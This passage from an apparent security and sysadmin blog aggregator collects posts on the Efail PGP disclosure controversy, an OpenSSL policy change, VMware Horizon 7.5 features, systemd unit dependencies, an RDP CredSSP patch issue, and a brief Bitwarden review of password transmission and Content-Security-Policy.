rather than write about fun things — like the creation of CFB and CBC gadgets — today, I’m going to write about something much less exciting: the problem of vulnerability disclosure in ecosystems like PGP. And how bad reactions to disclosure can hurt us all. ### How Efail was disclosed to the PGP community Putting together a comprehensive timeline of the Efail disclosure process would probably be a boring, time-intensive project. Fortunately Thomas Ptacek loves boring and time-intensive projects, and has already done this for us. Briefly, the first Efail disclosures to vendors began last October, more than 200 days prior to the agreed publication date. The authors notified a large number of vulnerable PGP GUI clients, and also notified the GnuPG project (on which many of these projects depend) by February at the latest. From what I can tell every major vendor agreed to make some kind of patch. GnuPG decided that it wasn’t their fault, and basically stopped corresponding. All parties agreed not to publicly discuss the vulnerability until an agreed date in April, which was later pushed back to May 15. The researchers also notified the EFF and some journalists under embargo, but none of them leaked anything. On May 14 someone dumped the bug onto a mailing list. So the EFF posted a notice about the vulnerability (which we’ll discuss a bit more below), and the researchers put up a website. That’s pretty much the whole story. There are three basic accusations going around about the Efail disclosure. They can be summarized as (1) maintaining embargoes in coordinated disclosures is really hard, (2) the EFF disclosure “unfairly” made this sound like a serious vulnerability “when it isn’t”, and (3) everything was already patched anyway so what’s the big deal. ### Disclosures are hard; particularly coordinated ones I’ve been involved in two disclosures of flaws in open encryption protocols. (Both were TLS issues.) Each one poses an impossible dilemma. You need to simultaneously (a) make sure every vendor has as much advance notice as possible, so they can patch their software. But at the same time (b) you need to avoid telling literally anyone, because nothing on the Internet stays secret. At some point you’ll notify some FOSS project that uses an open development mailing list or ticket server, and the whole problem will leak out into the open. Disclosing bugs that affect PGP is particularly fraught. That’s because there’s no such thing as “PGP”. What we have instead is a large and distributed community that revolves around the OpenPGP protocol. The pillar of this community is the GnuPG project, which maintains the core GnuPG tool and libraries that many clients rely on. Then there are a variety of niche GUI-based clients and email plugin projects. Finally, there are commercial vendors like Apple and Microsoft. (Who are mostly involved in the S/MIME side of things, and may reluctantly allow PGP plugins.) Then, of course there are thousands of end-users, who will generally fail to update their software unless something really bad and newsworthy happens. The obvious solution to the disclosure problem to use a staged disclosure. You notify the big commercial vendors first, since that’s where most of the affected users are. Then you work your way down the “long tail” of open source projects, knowing that inevitably the embargo could break and everyone will have to patch in a hurry. And you keep in mind that no matter what happens, everyone will blame you for screwing up the disclosure. For the PGP issues in Efail, the big client vendors are Mozilla (Thunderbird), Microsoft (Outlook) and maybe Apple (Mail). The very next obvious choice would be to patch the GnuPG tool so that it no longer spits out unauthenticated plaintext, which is the root of many of the problems in Efail. The Efail team appears to have pursued exactly this approach for the client-side vulnerabilities. Sadly, the GnuPG team made the decision that it’s not their job to pre-emptively address problems that they view as ‘clients misusing the GnuPG API’ (my paraphrase), even when that misuse appears to be rampant across many of the clients that use their tool. And so the most obvious fix for one part of the problem was not available. This is probably the most unfortunate part of the Efail story, because in this case GnuPG is very much at fault. Their API does something that directly violates cryptographic best practices — namely, releasing unauthenticated plaintext prior to producing an error message. And while this could be understood as a reasonable API design at design time, continuing to support this API even as clients routinely misuse it has now led to flaws across the ecosystem. The refusal of GnuPG to take a leadership role in preemptively safeguarding these vulnerabilities both increases the difficulty of disclosing these flaws, and increases the probability of future issues. ### So what went wrong with the Efail disclosure? Despite what you may have heard, given the complexity of this disclosure, very little went wrong. The main issues people have raised seem to have to do with the contents of an EFF post. And with some really bad communications from Robert J. Hansen at the Enigmail (and GnuPG) project. The EFF post. The Efail researchers chose to use the Electronic Frontier Foundation as their main source for announcing the existence of the vulnerability to the privacy community. This hardly seems unreasonable, because the EFF is generally considered a trusted broker, and speaks to the right community (at least here in the US). The EFF post doesn’t give many details, nor does it give a list of affected (or patched) clients. It does give two pretty mild recommendations: 1. Temporarily disable or uninstall your existing clients until you’ve checked that they’re patched. 2. Maybe consider using a more modern cryptosystem like Signal, at least until you know that your PGP client is safe again. This naturally led to a huge freakout by many in the PGP community. Some folks, including vendors, have misrepresented the EFF post as essentially pushing people to “permanently” uninstall PGP, which will “put lives at risk” because presumably these users (whose lives are at risk, remember) will immediately fall back to sending incriminating information via plaintext emails — rather than temporarily switching their communications to one of several modern, well-studied secure messengers, or just not emailing for a few hours. In case you think I’m exaggerating about this, here’s one reaction from ProtonMail: The most reasonable criticism I’ve heard of the EFF post is that it doesn’t give many details about which clients are patched, and which are vulnerable. This could presumably give someone the impression that this vulnerability is still present in their email client, and thus would cause them to feel less than secure in using it. I have to be honest that to me that sounds like a really good outcome. The problem with Efail is that it doesn’t matter if your client is secure. The Efail vulnerability could affect you if even a single one of your communication partners is using an insecure client. So needless to say I’m not very sympathetic to the reaction around the EFF post. If you can’t be sure whether your client is secure, you probably should feel insecure. Bad communications from GnuPG and Enigmail. On the date of the disclosure, anyone looking for accurate information about security from two major projects — GnuPG and Enigmail — would not have been able to find it. They wouldn’t have found it because developers from both Enigmail and GnuPG were on mailing lists and Twitter claiming that they had never heard of Efail, and hadn’t been notified by the researchers. Needless to say, these allegations took off around the Internet, sometimes in place of real information that could have helped users (like, whether either project had patched.) It goes without saying that neither allegation was actually true. In fact, both project members soon checked with their fellow developers (and their memories) and found out that they’d both been given months of notice by the researchers, and that Enigmail had even developed a patch. (However, it turned out that even this patch may not perfectly address the issue, and the community is still working to figure out exactly what still needs to be done.) This is an understandable mistake, perhaps. But it sure is a bad one. ### PGP is bad technology and it’s making a bad community Now that I’ve made it clear that neither the researchers nor the EFF is out to get the PGP community, let me put on my mask and horns and tell you why someone should be. I’ve written extensively about PGP on this blog, but in the past I’ve written mostly from a technical point of view about the problems with PGP. But what’s really problematic about PGP is not just the cryptography; it’s the story it tells about path dependence and how software communities work. The fact of the matter is that OpenPGP is not really a cryptography project. That is, it’s not held together by cryptography. It’s held together by backwards-compatibility and (increasingly) a kind of an obsession with the idea of PGP as an end in and of itself, rather than as a means to actually make end-users more secure. Let’s face it, as a protocol, PGP/OpenPGP is just not what we’d develop if we started over today. It was formed over the years out of mostly experimental parts, which were in turn replaced, bandaged and repaired — and then worked into numerous implementations, which all had to be insanely flexible and yet compatible with one another. The result is bad, and most of the software implementing it is worse. It’s the equivalent of a beloved antique sports car, where the electrical system is totally shot, but it still drives. You know, the kind of car where the owner has to install a hand-switch so he can turn the reverse lights on manually whenever he wants to pull out of a parking space. If PGP went away, I estimate it would take the security community less than a year to entirely replace (the key bits of) the standard with something much better and modern. It would have modern crypto and authentication, and maybe even extensions for future post-quantum future security. It would be simple. Many bright new people would get involved to help write the inevitable Rust, Go and Javascript clients and libraries. Unfortunately for us all, (Open)PGP does exist. And that means that even fancy greenfield email projects feel like they need to support OpenPGP, or at least some subset of it. This in turn perpetuates the PGP myth, and causes other clients to use it. And as a direct result, even if some clients re-implement OpenPGP from scratch, other clients will end up using tools like GnuPG which will support unauthenticated encryption with bad APIs. And the cycle will go round and around, like a spaceship stuck near the event horizon of a black hole. And as the standard perpetuates itself, largely for the sake of being a standard, it will fail to attract new security people. It will turn away exactly the type of people who should be working on these tools. Those people will go off and build encryption systems in a totally different area, or they’ll get into cryptocurrency. And — with some exceptions — the people who work in the community will increasingly work in that community because they’re supporting PGP, and not because they’re trying to seek out the best security technologies for their users. And the serious (email) users of PGP will be using it because they like the idea of using PGP better than they like using an actual, secure email standard. And as things get worse, and fail to develop, people who work on it will become more dogmatic about its importance, because it’s something threatened and not a real security protocol that anyone’s using. To me that’s where PGP is going today, and that is why the community has such a hard time motivating itself to take these vulnerabilities seriously, and instead reacts defensively. Maybe that’s a random, depressing way to end a post. But that’s the story I see in OpenPGP. And it makes me really sad. ## May 16, 2018 ### OpenSSL #### Changing the Guiding Principles in Our Security Policy “That we remove “We strongly believe that the right to advance patches/info should not be based in any way on paid membership to some forum. You can not pay us to get security patches in advance.” from the security policy and Mark posts a blog entry to explain the change including that we have no current such service.” At the OpenSSL Management Committee meeting earlier this month we passed the vote above to remove a section our security policy. Part of that vote was that I would write this blog post to explain why we made this change. At each face to face meeting we aim to ensure that our policies still match the view of the current membership committee at that time, and will vote to change those that don’t. Prior to 2018 our Security Policy used to contain a lot of background information on why we selected the policy we did, justifying it and adding lots of explanatory detail. We included details of things we’d tried before and things that worked and didn’t work to arrive at our conclusion. At our face to face meeting in London at the end of 2017 we decided to remove a lot of the background information and stick to explaining the policy simply and concisely. I split out what were the guiding principles from the policy into their own list. OpenSSL has some full-time fellows who are paid from various revenue sources coming into OpenSSL including sponsorship and support contracts. We’ve discussed having the option in the future to allow us to share patches for security issues in advance to these support contract customers. We already share serious issues a little in advance with some OS vendors (and this is still a principle in the policy to do so), and this policy has helped ensure that the patches and advisory get an extra level of testing before being released. Thankfully there are relatively few serious issues in OpenSSL these days; the last worse than Moderate severity being in February 2017. In the vote text we wrote that we have “no current such service” and neither do we have any plan right now to create such a service. But we allow ourselves to consider such a possibility in the future now that this principle, which no longer represents the view of the OMC, is removed. ## May 15, 2018 ### TaoSecurity #### Bejtlich Joining Splunk Since posting Bejtlich Moves On I've been rebalancing work, family, and personal life. I invested in my martial arts interests, helped more with home duties, and consulted through TaoSecurity. Today I'm pleased to announce that, effective Monday May 21st 2018, I'm joining the Splunk team. I will be Senior Director for Security and Intelligence Operations, reporting to our CISO, Joel Fulton. I will help build teams to perform detection and monitoring operations, digital forensics and incident response, and threat intelligence. I remain in the northern Virginia area and will align with the Splunk presence in Tyson's Corner. I'm very excited by this opportunity for four reasons. First, the areas for which I will be responsible are my favorite aspects of security. Long-time blog readers know I'm happiest detecting and responding to intruders! Second, I already know several people at the company, one of whom began this journey by Tweeting about opportunities at Splunk! These colleagues are top notch, and I was similarly impressed by the people I met during my interviews in San Francisco and San Jose. Third, I respect Splunk as a company. I first used the products over ten years ago, and when I tried them again recently they worked spectacularly, as I expected. Fourth, my new role allows me to be a leader in the areas I know well, like enterprise defense and digital operational art, while building understanding in areas I want to learn, like cloud technologies, DevOps, and security outside enterprise constraints. I'll have more to say about my role and team soon. Right now I can share that this job focuses on defending the Splunk enterprise and its customers. I do not expect to spend a lot of time in sales cycles. I will likely host visitors in the Tyson's areas from time to time. I do not plan to speak as much with the press as I did at Mandiant and FireEye. I'm pleased to return to operational defense, rather than advise on geopolitical strategy. If this news interests you, please check our open job listings in information technology. As a company we continue to grow, and I'm thrilled to see what happens next! ## May 14, 2018 ### ma.ttias.be #### Remote Desktop error: CredSSP encryption oracle remediation The post Remote Desktop error: CredSSP encryption oracle remediation appeared first on ma.ttias.be. A while back, Microsoft announced it would ship updates to both its RDP client & server components to resolve a critical security vulnerability. That rollout is now happening and many clients have received auto-updates for their client. As a result, you might see this message/error when connecting to an unpatched Windows server: It refers to CredSSP updates for CVE-2018-0886, which further explains the vulnerability and why it's been patched now. But here's the catch: if your client is updated but your server isn't (yet), you can no longer RDP to that machine. Here's a couple of fixes; 1. Find an old computer/RDP client to connect with 2. Get console access to the server to run the updates & reboot the machine If your client has been updated, there's no way to connect to an unpatched Windows server via Remote Desktop anymore. The post Remote Desktop error: CredSSP encryption oracle remediation appeared first on ma.ttias.be. ## May 08, 2018 ### Sean's IT Blog #### VMware Horizon and Horizon Cloud Enhancements – Part 1 This morning, VMware announced enhancements to both the on-premises Horizon Suite and Horizon Cloud product sets. Although there are a lot of additions to all products in the Suite, the VMware blog post did not go too indepth into many of the new features that you’ll be seeing in the upcoming editions. ### VMware Horizon 7.5 Let’s start with the biggest news in the blog post – the announcement of Horizon 7.5. Horizon 7.5 brings several new, long-awaited, features with it. Some of these features are: 1. Support for Horizon on VMC (VMware on AWS) 2. The “Just-in-Time” Management Platform (JMP) 3. Horizon 7 Extended Service Branch (ESB) 4. Instant Clone improvements, including support for the new vSphere 6.7 Instant Clone APIs 5. Support for IPv4/IPv6 Mixed-Mode Operations 6. Cloud-Pod Architecture support for 200K Sessions 7. Support for Windows 10 Virtualization-Based Security (VBS) and vTPM on Full Clone Desktops 8. RDSH Host-based GPO Support for managing protocol settings I’m not going to touch on all of these items. I think the first four are the most important for this portion of the suite. #### Horizon on VMC Horizon on VMC is a welcome addition to the Horizon portfolio. Unlike Citrix, the traditional VMware Horizon product has not had a good cloud story because it has been tightly coupled to the VMware SDDC stack. By enabling VMC support for Horizon, customers can now run virtual desktops in AWS, or utilize VMC as a disaster recovery option for Horizon environments. Full clone desktops will be the only desktop type supported in the initial release of Horizon on VMC. Instant Clones will be coming in a future release, but some additional development work will be required since Horizon will not have the same access to vCenter in VMC as it has in on-premises environments. I’m also hearing that Linked Clones and Horizon Composer will not be supported in VMC. The initial release of Horizon on VMC will only support core Horizon, the Unified Access Gateway, and VMware Identity Manager. Other components of the Horizon Suite, such as UEM, vRealize Operations, and App Volumes have not been certified yet (although there should be nothing stopping UEM from working in Horizon on VMC because it doesn’t rely on any vSphere components). Security Server, Persona Management, and ThinApp will not be supported. #### Horizon Extended Service Branches Under the current release cadence, VMware targets one Horizon 7 release per quarter. The current support policy for Horizon states that a release only continues to receive bug fixes and security patches if a new point release hasn’t been available for at least 60 days. Let’s break that down to make it a little easier to understand. 1. VMware will support any version of Horizon 7.x for the lifecycle of the product. 2. If you are currently running the latest Horizon point release (ex. Horizon 7.4), and you find a critical bug/security issue, VMware will issue a hot patch to fix it for that version. 3. If you are running Horizon 7.4, and Horizon 7.5 has been out for less than 60 days when you find a critical bug/security issue, VMware will issue a hot patch to fix it for that version. 4. If you are running Horizon 7.4, and Horizon 7.5 has been out for more than 60 days when you find a critical bug/security issue, the fix for the bug will be applied to Horizon 7.5 or later, and you will need to upgrade to receive the fix. In larger environments, Horizon upgrades can be non-trivial efforts that enterprises may not undertake every quarter. There are also some verticals, such as healthcare, where core business applications are certified against specific versions of a product, and upgrading or moving away from that certified version can impact support or support costs for key business applications. With Horizon 7.5, VMware is introducing a long-term support bundle for the Horizon Suite. This bundle will be called the Extended Service Branch (ESB), and it will contain Horizon 7, App Volumes, User Environment Manager, and Unified Access Gateway. The ESB will have 2 years of active support from release date where it will receive hot fixes, and each ESB will receive three service packs with critical bug and security fixes and support for new Windows 10 releases. A new ESB will be released approximately every twelve months. Each ESB branch will support approximately 3-4 Windows 10 builds, including any recent LTSC builds. That means the Horizon 7.5 ESB release will support the Windows 10 1709, 1803, 1809 and 1809 LTSC builds of Windows 10. This packaging is nice for enterprise organizations that want to limit the number of Horizon upgrades they want to apply in a year or require long-term support for core business applications. I see this being popular in healthcare environments. Extended Service Branches do not require any additional licensing, and customers will have the option to adopt either the current release cadence or the extended service branch when implementing their environment. #### JMP The Just-in-Time Management Platform, or JMP, is a new component of the Horizon Suite. The intention is to bring together Horizon, Active Directory, App Volumes, and User Environment Manager to provide a single portal for provisioning instant clone desktops, applications, and policies to users. JMP also brings a new, HTML5 interface to Horizon. I’m a bit torn on the concept. I like the idea behind JMP and providing a portal for enabling user self-provisioning. But I’m not sure building that portal into Horizon is the right place for it. A lot of organizations use Active Directory Groups as their management layer for Horizon Desktop Pools and App Volumes. There is a good reason for doing it this way. It’s easy to audit who has desktop or application access, and there are a number of ways to easily generate reports on Active Directory Group membership. Many customers that I talk to are also attempting to standardize their IT processes around an ITSM platform that includes a Service Catalog. The most common one I run across is ServiceNow. The customers that I’ve talked to that want to implement self-service provisioning of virtual desktops and applications often want to do it in the context of their service catalog and approval workflows. It’s not clear right now if JMP will include an API that will allow customers to integrate it with an existing service catalog or service desk tool. If it does include an API, then I see it being an important part of automated, self-service end-user computing solutions. If it doesn’t, then it will likely be another yet-another-user-interface, and the development cycles would have been better spent on improving the Horizon and App Volumes APIs. Not every customer will be utilizing a service catalog, ITSM tool and orchestration. For those customers, JMP could be an important way to streamline IT operations around virtual desktops and applications and provide them some benefits of automation. #### Instant Clone Enhancements The release of vSphere 6.7 brought with it new Instant Clone APIs. The new APIs bring features to VMFork that seem new to pure vSphere Admins but have been available to Horizon for some time such as vMotion. The new APIs are why Horizon 7.4 does not support vSphere 6.7 for Instant Clone desktops. Horizon 7.5 will support the new vSphere 6.7 Instant Clone APIs. It is also backward compatible with the existing vSphere 6.0 and 6.5 Instant Clone APIs. There are some other enhancements coming to Instant Clones as well. Instant Clones will now support vSGA and Soft3D. These settings can be configured in the parent image. And if you’re an NVIDIA vGPU customer, more than one vGPU profile will be supported per cluster when GPU Consolidation is turned on. NVIDIA GRID can only run a single profile per discrete GPU, so this feature will be great for customers that have Maxwell-series boards, especially the Tesla M10 high-density board that has four discrete GPUs. However, I’m not sure how beneficial it will be with customer that adopt Pascal-series or Volta-series Tesla cards as these only have a single discrete GPU per board. There may be some additional design considerations that need to be worked out. Finally, there is one new Instant Clone feature for VSAN customers. Before I explain the feature, I can to explain how Horizon utilizes VMFork and Instant Clone technology. Horizon doesn’t just utilize VMFork – it adds it’s own layers of management on top of it to overcome the limitations of the first generation technology. This is how Horizon was able to support Instant Clone vMotion when the standard VMFork could not. This additional layer of management also allows VMware to do other cool things with Horizon Instant Clones without having to make major changes to the underlying platform. One of the new features that is coming in Horizon 7.5 for VSAN customers is the ability to use Instant Clones across cluster boundaries. For those who aren’t familiar with VSAN, it is VMware’s software-defined storage product. The storage boundary for VSAN aligns with the ESXi cluster, so I’m not able to stretch a VSAN datastore between vSphere clusters. So if I’m running a large EUC environment using VSAN, I may need multiple clusters to meet the needs of my user base. And unlike 3-tier storage, I can’t share VSAN datastores between clusters. Under the current setup in Horizon 7.4, I would need to have a copy of my gold/master/parent image in each cluster. Due to some changes made in Horizon 7.5, I can now share an Instant Clone gold/master/parent image across VSAN clusters without having to make a copy of it in each cluster first. I don’t have too many specific details on how this will work, but it could significantly reduce the management burden of large, multi-cluster Horizon environments on VSAN. #### Blast Extreme Enhancements The addition of Blast Extreme Adaptive Transport, or BEAT as it’s commonly known, provided an enhanced session remoting experience when using Blast Extreme. It also required users and administrators to configure which transport they wanted to use in the client, and this could lead to less than optimal user experience for users who frequently moved between locations with good and bad connectivity. Horizon 7.5 adds some automation and intelligence to BEAT with a feature called Blast Extreme Network Intelligence. NI will evaluate network conditions on the client side and automatically choose the correct Blast Extreme transport to use. Users will no longer have to make that choice or make changes in the client. As a result, the Excellent, Typical, and Poor options are being removed from future versions of the Horizon client. Another major enhancment coming to Blast Extreme is USB Redirection Port Consolidation. Currently, USB redirection utilizes a side channel that requires an additional port to be opened in any external-facing firewalls. Starting in Horizon 7.5, customers will have the option to utilize USB redirection over ports 443/8443 instead of the side channel. #### Performance Tracker The last item I want to cover in this post is Performance Tracker. Performance Tracker is a tool that Pat Lee demonstrated at VMworld last year, and it is a tool to present session performance metrics to end users. It supports both Blast Extreme and PCoIP, and it provides information such as session latency, frames per second, Blast Extreme transport type, and help with troubleshooting connectivity issues between the Horizon Agent and the Horizon Client. #### Part 2 As you can see, there is a lot of new stuff in Horizon 7.5. We’ve hit 1900 words in this post just talking about what’s new in Horizon. We haven’t touched on client improvements, Horizon Cloud, App Volumes, UEM or Workspace One Intelligence yet. So we’ll have to break those announcements into another post that will be coming in the next day or two. ### Everything Sysadmin #### SO (my employer) is hiring a Windows SRE/sysadmin in NY/NJ Come work with Stack Overflow's SRE team! We're looking for a Windows system administrator / SRE to join our SRE team at Stack Overflow. (The downside is that I'll be your manager... ha ha ha). Anyway... the full job description is here: https://stackoverflow.com/company/work-here/1152509/ A quick and unofficial FAQ: Q: NYC/NJ? I thought Stack was an "remote first" company! Whudup with that? A: While most of the SRE team works remotely, we like to have a few team members near each of our datacenters (Jersey City, NJ and Denver, CO). You won't be spending hours each week pulling cables, I promise you. In fact, we use remote KVMs, and a "remote hands" service for most things. Heck, a lot of our new products are running in "the cloud" (and probably more over time). That said, it's good to have 1-2 people within easy travel distance of the datacenters for emergencies. Q: Can I work from home? A: Absolutely. You can work from home (we'll ship you a nice desk, chair and other great stuff) or you can work from our NYC office (see the job advert for a list of perks). Either way, you will need to be able to get to the Jersey City, NJ data center in a reasonable amount of time (like... an hour). Q: Wait... Windows? A: Yup. We're a mixed Windows and Linux environment. We're doing a lot of cutting edge stuff with Windows. We were early adopters of PowerShell (if you love PowerShell, definitely apply!) and DSC and a number of other technologies. Microsoft's containers is starting to look good too (hint, hint). Q: You mentioned another datacenter in Denver, CO. What if I live near there? A: This position is designated as "NY/NJ". However, watch this space. Or, if you are impatient, contact me and I'll loop you in. Q: Where do I get more info? How do I apply? ## May 07, 2018 ### SysAdmin1138 #### Systemd dependencies There is a lot of hate around Systemd in unixy circles. Like, a lot. There are many reasons for this, a short list: • For some reason they felt the need to reimplement daemons that have existed for years. And are finding the same kinds of bugs those older daemons found and squashed over a decade ago. • I'm looking at you Time-sync and DNS resolver. • It takes away an init system that everyone knows and is well documented in both the official documentation sense, and the unofficial 'millions of blog-posts' sense. Blog posts like this one. • It has so many incomprehensible edge-cases that make reasoning about the system even harder. • The maintainers are steely-eyed fundamentalists who know exactly how they want everything. • Because it runs so many things in parallel, bugs we've never had to worry about are now impossible to ignore. So much hate. Having spent the last few weeks doing a sysv -> systemd migration, I've found another reason for that hate. And it's one I'm familiar with because I've spent so many years in the Puppet ecosystem. People love to hate on puppet because of the wacky non-deterministic bugs. The order resources are declared in a module is not the order in which they are applied. Puppet uses a dependency model to determine the order of things, which leads to weird bugs where a thing has worked for two weeks but suddenly stops working that way because a new change was made somewhere that changed the order of resource-application. A large part of why people like Chef over Puppet is because Chef behaves like a scripting language, where the order of the file is the order things are done in. Guess what? Systemd uses the Puppet model of dependency! This is why its hard to reason. And why I, someone who has been handling these kinds of problems for years, haven't spent much time shaking my tiny fist at an uncaring universe. There has been swearing, oh yes. But of a somewhat different sort. The Puppet Model Puppet has two kinds of dependency. Strict ordering, and do this if that other thing does something. Which makes for four ways of linking resources. • requires => Do this after this other thing. • before => Do this before this other thing. • subscribes => Do this after this other thing, but only if this other thing changes something. • notifies => Do this before this other thing, and tell it you changed something. This makes for some real power, while also making the system hard to reason about. Thing is, systemd goes a step further The Systemd Model Systemd also has dependencies, but it was also designed to run as much in parallel as possible. Puppet was written in Ruby, so has a strong single-threaded tendencies. Systemd is multi-threaded. Multi-threaded systems are harder to reason about in general. Add on dependency ordering to multi-threaded issues and you get a sheer cliff of learning before you can have a hope of following along. Even better (worse), systemd has more ways of defining relationships. • Before= This unit needs to get all the way done before the named units are even started. And, the named units only get started if this unit finishes successfully. • After= This unit only gets started if the named units run to completion first, successfully. • Requires= The named units will get started if this one is, and do so at the same time. Not only that, but if the named units are explicitly stopped, this one will be stopped as well. For puppet-heads, this breaks things since this works backwards. • BindsTo= Does everything Requires does, but will also stop this unit if the named unit stops for any reason, not just explicit stops. • Wants= Like Require, but less picky. The named units will get started, but not care if they can't start or end up failing. • Requisite= Like Require, but will fail immediately if the named services aren't started yet. Think of mount units not starting unless the device unit is already started. • Conflicts= A negative dependency. Turn this unit off if the named unit is started. And turn this other unit off if this unit is started. There are several more I'm not going into. This is a lot, and some of these work independently. The documentation even says: It is a common pattern to include a unit name in both the After= and Requires= options, in which case the unit listed will be started before the unit that is configured with these options. Using both After and Requires means that the named units need to get all the way done (After=) before this unit is started. And if this unit is started, the named units need to get started as well (Require=). Hence, in many cases it is best to combine BindsTo= with After=. Using both configures a hard dependency relationship. After= means the other unit needs to be all the way started before this one is started. BindsTo= makes it so that this unit is only ever in an active state when the unit named in both BindsTo= and After= is in an active state. If that other unit fails or goes inactive, this one will as well. There is also a concept missing from Puppet, and that's when the dependency fires. After/Before are trailing-edge triggers, they fire on completion, which is how Puppet works. Most of the rest are leading-edge triggered, where the dependency is satisfied as soon as the named units start. This is how you get parallelism in an init-system, and why the weirder dependencies are often combined with either Before or After. Systemd hate will continue for the next 10 or so years, at least long enough for most Linux engineers to have been working with it to stop grumbling about how nice the olden days were. It also means that fewer people will be writing startup services due to the complexity of doing anything other than 'start this after this other thing' ordering. ## May 02, 2018 ### ma.ttias.be #### DNS Spy now checks for the “Null MX” The post DNS Spy now checks for the “Null MX” appeared first on ma.ttias.be. A small but useful addition to the scoring system of DNS Spy: support for the Null MX record. Internet mail determines the address of a receiving server through the DNS, first by looking for an MX record and then by looking for an A/AAAA record as a fallback. Unfortunately, this means that the A/AAAA record is taken to be mail server address even when that address does not accept mail. The No Service MX RR, informally called "null MX", formalizes the existing mechanism by which a domain announces that it accepts no mail, without having to provide a mail server; this permits significant operational efficiencies. Give it a try at the DNS Spy Scan page. The post DNS Spy now checks for the “Null MX” appeared first on ma.ttias.be. ## May 01, 2018 ### Anton Chuvakin - Security Warrior #### Monthly Blog Round-Up – April 2018 Here is my next monthly "Security Warrior" blog round-up of top 5 popular posts based on last month’s visitor data (excluding other monthly or annual round-ups): 1. “New SIEM Whitepaper on Use Cases In-Depth OUT!” (dated 2010) presents a whitepaper on select SIEM use cases described in depth with rules and reports [using now-defunct SIEM product]; also see this SIEM use case in depth and this for a more current list of popular SIEM use cases. Finally, see our research on developing security monitoring use cases here – and we just UPDATED IT FOR 2018. 2. Simple Log Review Checklist Released!” is often at the top of this list – this rapidly aging checklist is still a useful tool for many people. “On Free Log Management Tools” (also aged quite a bit by now) is a companion to the checklist (updated version) 3. Updated With Community Feedback SANS Top 7 Essential Log Reports DRAFT2” is about top log reports project of 2008-2013, I think these are still very useful in response to “what reports will give me the best insight from my logs?” 4. Again, my classic PCI DSS Log Review series is extra popular! The series of 18 posts cover a comprehensive log review approach (OK for PCI DSS 3+ even though it predates it), useful for building log review processes and procedures, whether regulatory or not. It is also described in more detail in our Log Management book and mentioned in our PCI book – note that this series is even mentioned in some PCI Council materials. 5. Why No Open Source SIEM, EVER?” contains some of my SIEM thinking from 2009 (oh, wow, ancient history!). Is it relevant now? You be the judge. Succeeding with SIEM requires a lot of work, whether you paid for the software, or not. BTW, this post has an amazing “staying power” that is hard to explain – I suspect it has to do with people wanting “free stuff” and googling for “open source SIEM” … In addition, I’d like to draw your attention to a few recent posts from my Gartner blog [which, BTW, now has more than 7X of the traffic of this blog]: Critical reference posts: Current research on testing security: Current research on threat detection “starter kit” Just finished research on SOAR: Miscellaneous fun posts: (see all my published Gartner research here) Also see my past monthly and annual “Top Popular Blog Posts” – 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017. Disclaimer: most content at SecurityWarrior blog was written before I joined Gartner on August 1, 2011 and is solely my personal view at the time of writing. For my current security blogging, go here. Other posts in this endless series: ### Electricmonk.nl #### A short security review of Bitwarden Bitwarden is an open source online password manager: The easiest and safest way for individuals, teams, and business organizations to store, share, and sync sensitive data. Bitwarden offers both a cloud hosted and on-premise version. Some notes on the scope of this blog post and disclaimers: • I only looked at the cloud hosted version. • This security review is not exhaustive, I only took about a few minutes to review various things. • I'm not a security researcher, just a paranoid enthusiast. If you find anything wrong with this blog post, please contact me at ferry DOT boender (AT) gmaildotcom. Here are my findings: ## Encryption password sent over the wire There appears to be no distinction between the authentication password and encryption password. When logging in, the following HTTP POST is made to Bitwarden's server: client_id: web grant_type: password password: xFSJdHvKcrYQA0KAgOlhxBB3Bpsuanc7bZIKTpskiWk= scope: api offline_access username: some.person@gmail.com That's a base64 encoded password. (Don't worry, I anonymized all secrets in this post, besides, it's all throw-away passwords anyway). Lets see what it contains: >>> import base64 >>> base64.b64decode('xFSJdHvKcrYQA0KAgOlhxBB3Bpsuanc7bZIKTpskiWk=') b'p\x54\xde\x35\xb6\x90\x992\x63bKn\x7f\xfbb\xb2\x94t\x1b\xe9f\xez\xeaz}e\x142X#\xbd\x1c' Okay, at least that's not my plain text password. It is encoded, hashed or encrypted somehow, but I'm not sure how. Still, it makes me nervous that my password is being sent over the wire. The master password used for encryption should never leave a device, in any form. I would have expected two password here perhaps. One for authentication and one for encryption. The reason it was implemented this way is probably because of the "Organizations" feature, which lets you share passwords with other people. Sharing secrets among people is probably hard to do in a secure way. I'm no cryptography expert, but there are probably ways to do this more securely using asymmetric encryption (public and private keys), which Bitwarden doesn't appear to be using. Bitwarden has a FAQ entry about its use of encryption, which claims that passwords are never sent over the wire unencrypted or unhashed: Bitwarden always encrypts and/or hashes your data on your local device before it is ever sent to the cloud servers for syncing. The Bitwarden servers are only used for storing encrypted data. It is not possible to get your unencrypted data from the Bitwarden cloud servers. The FAQ entry on hashing is also relevant: Bitwarden salts and hashes your master password with your email address on the client (your computer/device) before it is transmitted to our servers. Once the server receives the hashed password from your computer/device it is then salted again with a cryptographically secure random value, hashed again and stored in our database. This process is repeated and hashes are compared every time you log in. The hashing functions that are used are one way hashes. This means that they cannot be reverse engineered by anyone at Bitwarden to reveal your true master password. In the hypothetical event that the Bitwarden servers were hacked and your data was leaked, the data would have no value to the hacker. However, there's a major caveat here which they don't mention. All of the encryption is done client-side by Javascript loaded from various servers and CDNs. This means that an attacker who gains control over any of these servers (or man-in-the-middle's them somehow) can inject any javascript they like, and obtain your password that way. ## Indiscriminate allowance / loading of external resources The good news is that Bitwarden uses Content-Security-Policy. The bad news is that it allows the loading of resources from a variety of untrusted sources. uMatrix shows the type of resources it's trying to load from various sources: Here's what the Content-Security-Policy looks like: content-security-policy: default-src 'self'; script-src 'self' 'sha256-ryoU+5+IUZTuUyTElqkrQGBJXr1brEv6r2CA62WUw8w=' https://www.google-analytics.com https://js.stripe.com https://js.braintreegateway.com https://www.paypalobjects.com https://maxcdn.bootstrapcdn.com https://ajax.googleapis.com; style-src 'self' 'unsafe-inline' https://maxcdn.bootstrapcdn.com https://assets.braintreegateway.com https://*.paypal.com https://fonts.googleapis.com; img-src 'self' data: https://icons.bitwarden.com https://*.paypal.com https://www.paypalobjects.com https://q.stripe.com https://haveibeenpwned.com https://chart.googleapis.com https://www.google-analytics.com; font-src 'self' https://maxcdn.bootstrapcdn.com https://fonts.gstatic.com; child-src 'self' https://js.stripe.com https://assets.braintreegateway.com https://*.paypal.com https://*.duosecurity.com; frame-src 'self' https://js.stripe.com https://assets.braintreegateway.com https://*.paypal.com https://*.duosecurity.com; Roughly translated, it allows indiscriminate loading and executing of scripts, css, web workers (background threads) and inclusion of framed content from a wide variety of untrusted sources such as CDNs, Paypal, Duosecurity, 